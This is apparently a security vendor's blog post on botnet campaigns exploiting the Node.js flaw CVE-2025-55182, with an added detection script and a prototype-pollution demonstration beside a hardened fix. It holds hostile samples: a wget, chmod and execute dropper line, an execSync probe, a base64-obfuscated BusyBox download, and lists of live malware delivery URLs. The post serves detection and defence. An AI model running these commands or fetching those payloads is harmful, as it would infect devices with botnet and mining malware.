
Shortly after details of CVE-2025-55182 became public, we began seeing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally known as React2Shell, affects Node.js applications that let user-supplied JSON data influence internal JavaScript object structures. When that input is not properly validated, attackers can escalate to remote command execution by reaching process.mainModule.require and, from there, child_process.execSync. For a complete overview of the vulnerability, see our deep-dive blog post on Business Insights.
Because this vulnerability is simple to weaponize and widely applicable, botnet operators adopted it within days. Telemetry from our smart home sensors for the past 30 days provides a clear picture of how the exploit is being used in active campaigns.
We recorded more than 150,000 blocked exploit attempts per day matching the React2Shell pattern. Most detections involved direct command injection signatures: BusyBox execution, file downloads via wget or curl, permission changes through chmod, and various obfuscation patterns, including base64 decoding sequences designed to evade simple filtering.
While some requests were reconnaissance probes, most were structured payloads intended to download and run malware.
A significant portion of the traffic originates from a datacenter in Poland. A single IP address was responsible for more than 12,000 React2Shell-related events, alongside port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior matches patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks.
Additional probing comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, indicating broad global participation in opportunistic exploitation.
Attack attempts targeted a wide variety of device types, underscoring their opportunistic nature. The most frequently targeted models included smart plugs, smartphones, NAS devices, surveillance systems, routers, development boards, and various makes and models of smart TVs and other consumer electronics.
The large number of unknown device fingerprints suggests that many attacks targeted generic Linux-based web interfaces that do not expose clear identification data. This spread matches established botnet targeting behavior: attackers probe any device with an exposed HTTP endpoint, regardless of manufacturer or purpose.
Payload analysis
We identified two major payload families delivered through React2Shell in the last week:
Mirai-style dropper: BusyBox commands that download binaries from infrastructure hosted at 193.34.213[.]150, using filenames such as x86 and bolts. The infection chain consists of download, permission modification, execution, and a follow-up request to retrieve secondary components.
The rondo.aqu.sh installer: a script served from 41.231.37[.]153 that fetches both a propagation module and a cryptocurrency mining component.
Both campaign types align with typical botnet monetization strategies: distributed denial-of-service capability, further worming, and illicit mining.
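As an added example (not code from the original post or from the sensor platform it describes), the following Node.js script classifies request bodies using the indicators named in the detection summary and in the payload analysis above: the process.mainModule.require and execSync chain, BusyBox, wget or curl downloads, chmod, and base64-decoding sequences. It decodes embedded base64 blobs before matching, so the obfuscated variant is caught by the same rules. The sample request bodies are constructed for illustration; the hosts and paths in the known-ioc rule are the ones listed at the end of this post; the rule names and verdict labels are my own.

```javascript
'use strict';

// Each rule names one indicator from the detections described in the post.
// The known-ioc entries come from the indicator list at the end of the post.
const RULES = [
  ['require-chain', /process\.mainModule\.require|require\(['"]child_process['"]\)/],
  ['exec-sink',     /\b(execSync|exec|spawnSync|spawn)\s*\(/],
  ['busybox',       /\bbusybox\b/i],
  ['downloader',    /\b(wget|curl|tftp)\b/i],
  ['chmod',         /\bchmod\s+(\+x|[0-7]{3,4})\b/],
  ['base64-decode', /\bbase64\s+(-d|--decode)\b/],
  ['known-ioc',     /193\.34\.213\.150|41\.231\.37\.153|rondo\.aqu\.sh|\/nuts\/(x86|bolts)/],
];

// Decode long base64-looking blobs and append the decoded text, so commands
// hidden behind "echo ... | base64 -d | sh" are scanned by the same rules.
function expandBase64(text) {
  let expanded = text;
  for (const match of text.matchAll(/[A-Za-z0-9+/]{24,}={0,2}/g)) {
    const decoded = Buffer.from(match[0], 'base64').toString('utf8');
    // Keep only decodes that look like text; binary noise adds nothing.
    if (/^[\t\n\r\x20-\x7e]+$/.test(decoded)) expanded += '\n' + decoded;
  }
  return expanded;
}

// Returns the matched indicator names and a coarse verdict:
//   dropper - download, chmod, BusyBox or a known delivery host (malware install)
//   probe   - reaches the require/exec chain but fetches nothing
//   benign  - none of the above
function classify(body) {
  const text = expandBase64(body);
  const indicators = RULES.filter(([, re]) => re.test(text)).map(([name]) => name);
  const has = (name) => indicators.includes(name);
  let verdict = 'benign';
  if (has('downloader') || has('busybox') || has('chmod') || has('known-ioc')) verdict = 'dropper';
  else if (has('require-chain') || has('exec-sink')) verdict = 'probe';
  return { verdict, indicators };
}

// Constructed sample request bodies (not captured traffic). The download host
// in the obfuscated sample is a documentation address, not a real IOC.
const SAMPLES = {
  benign: '{"user":"alice","theme":"dark"}',
  probe: "process.mainModule.require('child_process').execSync('id')",
  dropper: 'cd /tmp; wget http://193.34.213.150/nuts/x86; chmod 777 x86; ./x86',
  obfuscated: 'echo ' +
    Buffer.from('busybox wget http://192.0.2.10/x86 -O /tmp/x; chmod 777 /tmp/x; /tmp/x').toString('base64') +
    ' | base64 -d | sh',
};

// Print one line per sample: name, verdict, matched indicators.
function report() {
  for (const [name, body] of Object.entries(SAMPLES)) {
    const { verdict, indicators } = classify(body);
    console.log(`${name.padEnd(10)} ${verdict.padEnd(8)} ${indicators.join(', ')}`);
  }
}

report();
```

The verdict logic is deliberately coarse: any body that reaches a downloader, chmod or a known delivery host is treated as a dropper because that is what the observed payloads do, while a body that only reaches the require/exec chain is logged as a probe. In production the same rules would run on decoded request bodies rather than raw bytes, and the downloader rule would need tuning against fields where words like curl legitimately appear.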
Why React2Shell is being widely used
CVE-2025-55182 offers attackers a straightforward path from web request to system-level command execution. The exploit payload is compact, requires no advanced techniques, and works against a large class of Node.js applications. Botnet operators historically adopt vulnerabilities like this within days, and our monitoring shows that React2Shell is no exception.
What this means for users
The exploitation attempts we observed are automated and indiscriminate. Any publicly exposed service running a vulnerable implementation is a potential target. Organizations that develop or deploy Node.js applications should apply available patches immediately and verify that the code handling parsed JSON does not allow prototype pollution or other manipulation of internal object structures.
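To make the last recommendation concrete, here is an added example (mine, not code from the original post or from the vulnerable framework) of the bug class the paragraph names: a recursive merge of user-supplied JSON that pollutes Object.prototype through a "__proto__" key, shown beside a hardened version that rejects the dangerous keys before touching the target. The payload and settings objects are constructed for illustration; the example stops at the pollution itself and does not reproduce the React2Shell command-execution chain.

```javascript
'use strict';

// Recursive merge of parsed JSON into an existing object, written the way
// many option/config helpers are. JSON.parse turns a "__proto__" key into an
// own property, so target["__proto__"] resolves to Object.prototype and the
// recursion writes attacker-chosen properties onto every object in the process.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Keys through which a merge can reach the prototype chain.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Walk the untrusted input first and reject it whole, so a bad request never
// partially mutates the target.
function assertNoForbiddenKeys(obj) {
  if (!obj || typeof obj !== 'object') return;
  for (const key of Object.keys(obj)) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected key "${key}" in untrusted input`);
    assertNoForbiddenKeys(obj[key]);
  }
}

// Hardened merge: validate, recurse only into own properties, and create
// nested containers without a prototype so nothing inherited can be written.
function safeMerge(target, source) {
  assertNoForbiddenKeys(source);
  return mergeOwn(target, source);
}

function mergeOwn(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== 'object' || target[key] === null) {
        target[key] = Object.create(null);
      }
      mergeOwn(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker payload: a legitimate field plus a "__proto__" key.
const PAYLOAD = '{"theme":"dark","__proto__":{"isAdmin":true}}';

// Runs one merge function against PAYLOAD and reports whether an unrelated,
// freshly created object now carries the attacker's property.
function demonstrate(mergeFn) {
  const settings = { theme: 'light' };
  let rejected = false;
  try {
    mergeFn(settings, JSON.parse(PAYLOAD));
  } catch (e) {
    rejected = true;
  }
  const leaked = ({}).isAdmin === true;
  delete Object.prototype.isAdmin; // undo any pollution so later code is unaffected
  return { theme: settings.theme, leaked, rejected };
}

// Constructed clean input, to show the hardened merge still does its job.
const CLEAN = '{"theme":"dark","limits":{"rate":10}}';

function mergeClean() {
  const settings = { theme: 'light', limits: { rate: 5, burst: 2 } };
  return safeMerge(settings, JSON.parse(CLEAN));
}

console.log('unsafeMerge:', demonstrate(unsafeMerge));
console.log('safeMerge:  ', demonstrate(safeMerge));
console.log('clean input:', mergeClean());
```

With unsafeMerge the fresh object reports isAdmin as true, which is exactly the kind of structure manipulation that turns a JSON request into control over internal objects; with safeMerge the request is rejected and the settings object is untouched. As defense in depth, Node.js can be started with --disable-proto=throw (or =delete) so that "__proto__" is no longer a writable accessor at all, and Object.freeze(Object.prototype) at startup stops any merge helper you did not write from polluting it.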
For IoT and consumer devices, reducing exposure through proper network segmentation and disabling unnecessary remote access remains essential. Once a device is compromised, it is commonly repurposed as an attack platform, perpetuating the cycle of scanning and exploitation.
We will continue monitoring activity related to CVE-2025-55182 and provide updates as new payloads or threat actors emerge.
Primary exploit and malware delivery hosts observed in React2Shell campaigns:
193.34.213.150 - Used to deliver Mirai-style binaries under paths including /nuts/x86 and /nuts/bolts. Payloads retrieved through wget, curl, or BusyBox. Frequently paired with chmod 777 and direct execution.
41.231.37.153 - Host serving the script rondo.aqu.sh, which deploys both a botnet loader and a cryptocurrency miner. Accessed through wget or curl with a fallback BusyBox retrieval chain.
Payload URLs observed:
http://193.34.213.150/nuts/x86
http://193.34.213.150/nuts/bolts
http://89.144.31.18/nuts/x86
http://89.144.31.18/nuts/bolts
http://31.56.27.76/n2/x86
http://172.237.55.180/c
http://gfxnick.emerald.usbx.me/bot
http://41.231.37.153/rondo.aqu.sh
http://23.228.188.126/rondo.aqu.sh
http://176.117.107.154/bot
http://23.132.164.54/bot
https://f003.backblazeb2.com/file/mova12/98201-1-8/bot
When not diving deep into vulnerability assessments, I enjoy immersing myself in nature. I analyze binaries to the rhythms I love dancing to, letting the bits guide me both on and off the dance floor.
Paul Satmarean is a team leader with a strong focus on network security, botnets and technology. In his free time, he loves photography and gaming.